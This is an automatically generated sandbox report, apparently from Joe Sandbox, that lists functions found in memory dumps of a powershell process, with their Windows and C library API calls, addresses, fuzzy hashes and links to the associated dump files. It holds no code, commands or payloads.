Opcode ID: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
Instruction ID: 31f5dcd762ae6c781794c54052554a73d6cc4306ece4a8b039b24d36e042d8bf
Opcode Fuzzy Hash: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
Instruction Fuzzy Hash: B761C27DB03640CAE794CF1DE5553E832A0F77BB99F2C4529DA05573A1CB3AC44A8B82

Function 000001A6ED34BFC0 Relevance: 6.1, APIs: 4, Instructions: 140COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
Instruction ID: c08de2137109a1271946f73b16f9e63e2bbf336df8a45c9f96602de3a53317b6
Opcode Fuzzy Hash: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
Instruction Fuzzy Hash: DC61697A343A40E6E754CB1CE8453EA33A0E77BB55F2C4129D9194B7E5CB3AC44ACB42

Function 000001A6ED2F2170 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 94stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000001A6ED2F25F4: strchr.LIBCMT ref: 000001A6ED2F262E
Part of subcall function 000001A6ED2F25F4: strchr.LIBCMT ref: 000001A6ED2F264C
Part of subcall function 000001A6ED2F25F4: malloc.LIBCMT ref: 000001A6ED2F2664
Part of subcall function 000001A6ED2F25F4: malloc.LIBCMT ref: 000001A6ED2F2671
Part of subcall function 000001A6ED2F25F4: rand.LIBCMT ref: 000001A6ED2F273D

strchr.LIBCMT ref: 000001A6ED2F21D6
_snprintf.LIBCMT ref: 000001A6ED2F220C

Part of subcall function 000001A6ED2FEA3C: _errno.LIBCMT ref: 000001A6ED2FEA73
Part of subcall function 000001A6ED2FEA3C: _invalid_parameter_noinfo.LIBCMT ref: 000001A6ED2FEA7E

_snprintf.LIBCMT ref: 000001A6ED2F2223

Strings

not create token: %d, xrefs: 000001A6ED2F2205

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: strchr$_snprintfmalloc$_errno_invalid_parameter_noinforand
String ID: not create token: %d
API String ID: 1095232423-2272930512
Opcode ID: 9f33a31cc3dbe4d390e57a8e0463a50ad11e38a52d1dbdd6b3122e58f7288ae2
Instruction ID: 7a939c127dc3bbe616b2b423f78fa7738e631c01f1f06fdc4c19c9bb5caad9f9
Opcode Fuzzy Hash: 9f33a31cc3dbe4d390e57a8e0463a50ad11e38a52d1dbdd6b3122e58f7288ae2
Instruction Fuzzy Hash: 6541B07A305E80D5EB51DB2ED2452ECA3B1FFAAB84F085911DF4867B61DF34D1A68340

Function 000001A6ED344A04 Relevance: 6.1, APIs: 4, Instructions: 80synchronizationCOMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 000001A6ED344A45

Part of subcall function 000001A6ED34F284: _FF_MSGBANNER.LIBCMT ref: 000001A6ED34F2B4
Part of subcall function 000001A6ED34F284: _NMSG_WRITE.LIBCMT ref: 000001A6ED34F2BE
Part of subcall function 000001A6ED34F284: HeapAlloc.KERNEL32 ref: 000001A6ED34F2D9
Part of subcall function 000001A6ED34F284: _callnewh.LIBCMT ref: 000001A6ED34F2F2
Part of subcall function 000001A6ED34F284: _errno.LIBCMT ref: 000001A6ED34F2FD
Part of subcall function 000001A6ED34F284: _errno.LIBCMT ref: 000001A6ED34F308

htonl.WS2_32 ref: 000001A6ED344A5B

Part of subcall function 000001A6ED344C44: PeekNamedPipe.KERNEL32 ref: 000001A6ED344C7C

WaitForSingleObject.KERNEL32 ref: 000001A6ED344AB6
free.LIBCMT ref: 000001A6ED344AF2

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: _errno$AllocHeapNamedObjectPeekPipeSingleWait_callnewhfreehtonlmalloc
String ID:
API String ID: 2495333179-0
Opcode ID: 92903f8e34bb86019301daba1a442a9bec2b61465fa0227abaf91983d09bc4f7
Instruction ID: 1676700477183c7cfcdb4a92f1c83352ae21d53f03b6903de20116ccc0f07133
Opcode Fuzzy Hash: 92903f8e34bb86019301daba1a442a9bec2b61465fa0227abaf91983d09bc4f7
Instruction Fuzzy Hash: 61310A3E303A40C9E7A4DF2AA5403AD63A6FB57BC8F0D4524DE4507695DB7DC88AC346

Function 000001A6ED34C230 Relevance: 6.1, APIs: 4, Instructions: 70stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

_time64.LIBCMT ref: 000001A6ED34C254

Part of subcall function 000001A6ED35145C: GetSystemTimeAsFileTime.KERNEL32 ref: 000001A6ED35146A

Part of subcall function 000001A6ED35044C: _getptd.LIBCMT ref: 000001A6ED350454

malloc.LIBCMT ref: 000001A6ED34C29C
strtok.LIBCMT ref: 000001A6ED34C300
strtok.LIBCMT ref: 000001A6ED34C311

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: Timestrtok$FileSystem_getptd_time64malloc
String ID:
API String ID: 460628555-0
Opcode ID: 2fe16f1730b9e72f7102dc70ee842add604a2edc5f5efba699c173ab423aa684
Instruction ID: 0c52adc769d4be53fbe59cd098e35e74b4b843733e7c8dc0e79eb6f9e4c6d76a
Opcode Fuzzy Hash: 2fe16f1730b9e72f7102dc70ee842add604a2edc5f5efba699c173ab423aa684
Instruction Fuzzy Hash: 9E21E4BA702B94C1EB40CF59E0846DD77A8F367BD4F0E4265EE1A43786CB35C4468740

Function 000001A6ED30E9D8 Relevance: 6.1, APIs: 4, Instructions: 62stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000001A6ED30E9FC

Part of subcall function 000001A6ED300A00: _getptd.LIBCMT ref: 000001A6ED300A16
Part of subcall function 000001A6ED300A00: __updatetlocinfo.LIBCMT ref: 000001A6ED300A4B
Part of subcall function 000001A6ED300A00: __updatetmbcinfo.LIBCMT ref: 000001A6ED300A72

_errno.LIBCMT ref: 000001A6ED30EA08

Part of subcall function 000001A6ED301118: _getptd_noexit.LIBCMT ref: 000001A6ED30111C

_invalid_parameter_noinfo.LIBCMT ref: 000001A6ED30EA13
strchr.LIBCMT ref: 000001A6ED30EA29

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
String ID:
API String ID: 4151157258-0
Opcode ID: 89153f5c64fab27db57a2af5758249aa045b2e8adbb4ff24b9161b74b74b034e
Instruction ID: 586e1a3d949c8434b0c81334732b93b34f9d2f5279e3da08de018b9fbe639124
Opcode Fuzzy Hash: 89153f5c64fab27db57a2af5758249aa045b2e8adbb4ff24b9161b74b74b034e
Instruction Fuzzy Hash: A92105BA30A2A4C1EBE0D61D94503FEA6D0F36BBD4F1C4123EAD617AC5E92CC5499702

Function 000001A6ED2E04D0 Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

clock.LIBCMT ref: 000001A6ED2E0517
clock.LIBCMT ref: 000001A6ED2E0524
clock.LIBCMT ref: 000001A6ED2E052D
clock.LIBCMT ref: 000001A6ED2E053A

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: clock
String ID:
API String ID: 3195780754-0
Opcode ID: e2b349abe329f7009f7708ed868e84964882b604b0b8053b47ed61a3df0cf38d
Instruction ID: 5202222d7e940faac7d65b26baba50b19eb89063c032d5b336d64e498e51ae5f
Opcode Fuzzy Hash: e2b349abe329f7009f7708ed868e84964882b604b0b8053b47ed61a3df0cf38d
Instruction Fuzzy Hash: B9112736305744C9F3B2DEBA69802ABF690F7663D0F1D4025EF4417245E934C88AC782

Function 000001A6ED35F5D8 Relevance: 6.1, APIs: 4, Instructions: 62stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000001A6ED35F5FC

Part of subcall function 000001A6ED351600: _getptd.LIBCMT ref: 000001A6ED351616
Part of subcall function 000001A6ED351600: __updatetlocinfo.LIBCMT ref: 000001A6ED35164B
Part of subcall function 000001A6ED351600: __updatetmbcinfo.LIBCMT ref: 000001A6ED351672

_errno.LIBCMT ref: 000001A6ED35F608

Part of subcall function 000001A6ED351D18: _getptd_noexit.LIBCMT ref: 000001A6ED351D1C

_invalid_parameter_noinfo.LIBCMT ref: 000001A6ED35F613
strchr.LIBCMT ref: 000001A6ED35F629

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
String ID:
API String ID: 4151157258-0
Opcode ID: 981429a1da204f704ed88d261ee2d43387d2cfac4902a0026a6358d448239ec3
Instruction ID: fe3a510af9eb8f59cd7b5914b9a75e6ad8c777eda87d24390b5e7e6f696a55b9
Opcode Fuzzy Hash: 981429a1da204f704ed88d261ee2d43387d2cfac4902a0026a6358d448239ec3
Instruction Fuzzy Hash: E721E47E70B2A0C2EB60D71D90503FDA7D0E3A3BD4F1C4121EA960BAE5DA28C4498753

Function 000001A6ED3310D0 Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

clock.LIBCMT ref: 000001A6ED331117
clock.LIBCMT ref: 000001A6ED331124
clock.LIBCMT ref: 000001A6ED33112D
clock.LIBCMT ref: 000001A6ED33113A

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: clock
String ID:
API String ID: 3195780754-0
Opcode ID: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
Instruction ID: 990e569c8c98a8d8158bc4129d6282c89f8f7f1a3e372e4c125b3ee8e8c554c0
Opcode Fuzzy Hash: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
Instruction Fuzzy Hash: 30110A3AB05784C5F7B0DEAAAA406EBF790B767394F1D0131EE64537C6E974C889C602

Function 000001A6ED34EF5C Relevance: 6.0, APIs: 4, Instructions: 39networkCOMMON

Download Yara Rule

APIs

accept.WS2_32 ref: 000001A6ED34EF71
send.WS2_32 ref: 000001A6ED34EFAF
send.WS2_32 ref: 000001A6ED34EFC3
closesocket.WS2_32 ref: 000001A6ED34EFD4

Part of subcall function 000001A6ED34F098: closesocket.WS2_32 ref: 000001A6ED34F0A4
Part of subcall function 000001A6ED34F098: free.LIBCMT ref: 000001A6ED34F0AE
Part of subcall function 000001A6ED34F098: free.LIBCMT ref: 000001A6ED34F0B7
Part of subcall function 000001A6ED34F098: free.LIBCMT ref: 000001A6ED34F0C0

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: free$closesocketsend$accept
String ID:
API String ID: 47150829-0
Opcode ID: caadc6cbf8b8aa9901aecb44ddbc265dbb6e74dc9ec5a2b89a727a9022558361
Instruction ID: 4859824efc7a12394865ee916314c19f93f3a581cfebf32725e3dafabe7a92b5
Opcode Fuzzy Hash: caadc6cbf8b8aa9901aecb44ddbc265dbb6e74dc9ec5a2b89a727a9022558361
Instruction Fuzzy Hash: 2F01B93D311940C1EB64DB3AE665BAD2361E79BFF4F0D5111DE2607785CE2DC0898B02

Function 000001A6ED3453EC Relevance: 6.0, APIs: 4, Instructions: 34sleeppipeCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 000001A6ED345400
PeekNamedPipe.KERNEL32 ref: 000001A6ED345425
Sleep.KERNEL32 ref: 000001A6ED34543B
GetTickCount.KERNEL32 ref: 000001A6ED345441

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: CountTick$NamedPeekPipeSleep
String ID:
API String ID: 1593283408-0
Opcode ID: 210e21c30d6d06447862c16b29a5b20d0c0fb279467bc43041b9c33569e9406a
Instruction ID: a7d5617d400169271540b527ff960935f9f62f1574bca399e1a01aa6ab9a597e
Opcode Fuzzy Hash: 210e21c30d6d06447862c16b29a5b20d0c0fb279467bc43041b9c33569e9406a
Instruction Fuzzy Hash: B301D639715A50C2F720CB29F80434EA2A1F79BBC1F6C4130DB9846BA4DF3DC48A8706

Function 000001A6ED3448D8 Relevance: 6.0, APIs: 4, Instructions: 32sleeppipeCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 000001A6ED3448F1
PeekNamedPipe.KERNEL32 ref: 000001A6ED344916
Sleep.KERNEL32 ref: 000001A6ED34492C
GetTickCount.KERNEL32 ref: 000001A6ED344932

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: CountTick$NamedPeekPipeSleep
String ID:
API String ID: 1593283408-0
Opcode ID: aac62254f3a365505a6a564a1f05aa253f383d98e2b7473c1e2f14b721fad9df
Instruction ID: e63561c321fc1ea9b862e4f4a5af9540bd4d8e542aae5fae5f04f517b86d9eab
Opcode Fuzzy Hash: aac62254f3a365505a6a564a1f05aa253f383d98e2b7473c1e2f14b721fad9df
Instruction Fuzzy Hash: AD01D63A725A40C6F320CB18F44435EB761E79BBC0F684120DB8502A64DF7DC4998B05

Function 000001A6ED3476F0 Relevance: 6.0, APIs: 4, Instructions: 32memorythreadCOMMON

Download Yara Rule

APIs

InitializeProcThreadAttributeList.KERNEL32 ref: 000001A6ED34770E
GetProcessHeap.KERNEL32 ref: 000001A6ED347714
HeapAlloc.KERNEL32 ref: 000001A6ED347724
InitializeProcThreadAttributeList.KERNEL32 ref: 000001A6ED34773F

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: AttributeHeapInitializeListProcThread$AllocProcess
String ID:
API String ID: 1212816094-0
Opcode ID: 092ee1049558447ca0759a62b312a2f8f202331ccdb130be8b8fda5f5e098b35
Instruction ID: 54ba7b1bfd4b06961083674d9b3dbe1f423f5151f4621f2818daa33fbfb762e8
Opcode Fuzzy Hash: 092ee1049558447ca0759a62b312a2f8f202331ccdb130be8b8fda5f5e098b35
Instruction Fuzzy Hash: 34F0FC7E326640C2E754CB39A9417AE5790D79BBD0F5D5425BA4B42754CE3DC449C600

Function 000001A6ED34F098 Relevance: 6.0, APIs: 4, Instructions: 15COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 000001A6ED34F0A4
free.LIBCMT ref: 000001A6ED34F0AE

Part of subcall function 000001A6ED34F244: HeapFree.KERNEL32 ref: 000001A6ED34F25A
Part of subcall function 000001A6ED34F244: _errno.LIBCMT ref: 000001A6ED34F264
Part of subcall function 000001A6ED34F244: GetLastError.KERNEL32 ref: 000001A6ED34F26C

free.LIBCMT ref: 000001A6ED34F0B7
free.LIBCMT ref: 000001A6ED34F0C0

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: free$ErrorFreeHeapLast_errnoclosesocket
String ID:
API String ID: 1525665891-0
Opcode ID: 514671407b84a75ab4a957943dd5047acaa779434bbb8d29509bbfd64e64c7a5
Instruction ID: ddd2a46f96ea0c00a7d05e577b8cbb2390f017aae85e67d1db1e26e91a4f6c74
Opcode Fuzzy Hash: 514671407b84a75ab4a957943dd5047acaa779434bbb8d29509bbfd64e64c7a5
Instruction Fuzzy Hash: 7CE0623D711C44C1EF14EB76D8651AD1320E7ABFDDF1C00219E5E472A6CE59C45AC346

Function 000001A6ED2FEC60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001A6ED2FECB1

Part of subcall function 000001A6ED301118: _getptd_noexit.LIBCMT ref: 000001A6ED30111C

_invalid_parameter_noinfo.LIBCMT ref: 000001A6ED2FECBC

Strings

B, xrefs: 000001A6ED2FECE8

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: _errno_getptd_noexit_invalid_parameter_noinfo
String ID: B
API String ID: 1812809483-1255198513
Opcode ID: 60c63a2ab9f2c694e46ab874add7d0a6eb48e0963f6941f66a4f1d1620c6c169
Instruction ID: 06ee4a143bcf898511dfa7916f60dfe10993e83956c90ab5885e15cc11a86220
Opcode Fuzzy Hash: 60c63a2ab9f2c694e46ab874add7d0a6eb48e0963f6941f66a4f1d1620c6c169
Instruction Fuzzy Hash: 2B118E76715A44C6EB10DB1AD44039DB661F7AAFE4F684320AB5857BD6DF38C148CB01

Function 000001A6ED34F860 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001A6ED34F8B1

Part of subcall function 000001A6ED351D18: _getptd_noexit.LIBCMT ref: 000001A6ED351D1C

_invalid_parameter_noinfo.LIBCMT ref: 000001A6ED34F8BC

Strings

B, xrefs: 000001A6ED34F8E8

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: _errno_getptd_noexit_invalid_parameter_noinfo
String ID: B
API String ID: 1812809483-1255198513
Opcode ID: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
Instruction ID: 28f9ece0b15bcea73681a77f45a64d759ac8bb55bcc81038cdc506d98e250304
Opcode Fuzzy Hash: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
Instruction Fuzzy Hash: 53117C7A715A40C6EB10DB56E444399B7A1F7AABE4F684221AB580BB95CB38C149CB01

Function 000001A6ED2E10C4 Relevance: 5.3, APIs: 4, Instructions: 261COMMONLIBRARYCODE

Download Yara Rule

APIs

calloc.LIBCMT ref: 000001A6ED2E116A

Part of subcall function 000001A6ED30E208: _calloc_impl.LIBCMT ref: 000001A6ED30E218
Part of subcall function 000001A6ED30E208: _errno.LIBCMT ref: 000001A6ED30E22B
Part of subcall function 000001A6ED30E208: _errno.LIBCMT ref: 000001A6ED30E235

free.LIBCMT ref: 000001A6ED2E12F3
free.LIBCMT ref: 000001A6ED2E12FD
free.LIBCMT ref: 000001A6ED2E130F

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: free$_errno$_calloc_implcalloc
String ID:
API String ID: 4000150058-0
Opcode ID: 19338f0e73a96c99a948e3ad385d670715a7db7de0076dca34bbf1a16cc29eef
Instruction ID: 98e7a9b36c89a345673c0244feeb0207c12024cf57fe68167015dbcfbc7fc082
Opcode Fuzzy Hash: 19338f0e73a96c99a948e3ad385d670715a7db7de0076dca34bbf1a16cc29eef
Instruction Fuzzy Hash: D3C13B36705B84CAE7A1CF69E88039E77A4F799784F14412AEF8D87B58DB38C459CB01

Function 000001A6ED331CC4 Relevance: 5.3, APIs: 4, Instructions: 261COMMONLIBRARYCODE

Download Yara Rule

APIs

calloc.LIBCMT ref: 000001A6ED331D6A

Part of subcall function 000001A6ED35EE08: _calloc_impl.LIBCMT ref: 000001A6ED35EE18
Part of subcall function 000001A6ED35EE08: _errno.LIBCMT ref: 000001A6ED35EE2B
Part of subcall function 000001A6ED35EE08: _errno.LIBCMT ref: 000001A6ED35EE35

free.LIBCMT ref: 000001A6ED331EF3
free.LIBCMT ref: 000001A6ED331EFD
free.LIBCMT ref: 000001A6ED331F0F

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: free$_errno$_calloc_implcalloc
String ID:
API String ID: 4000150058-0
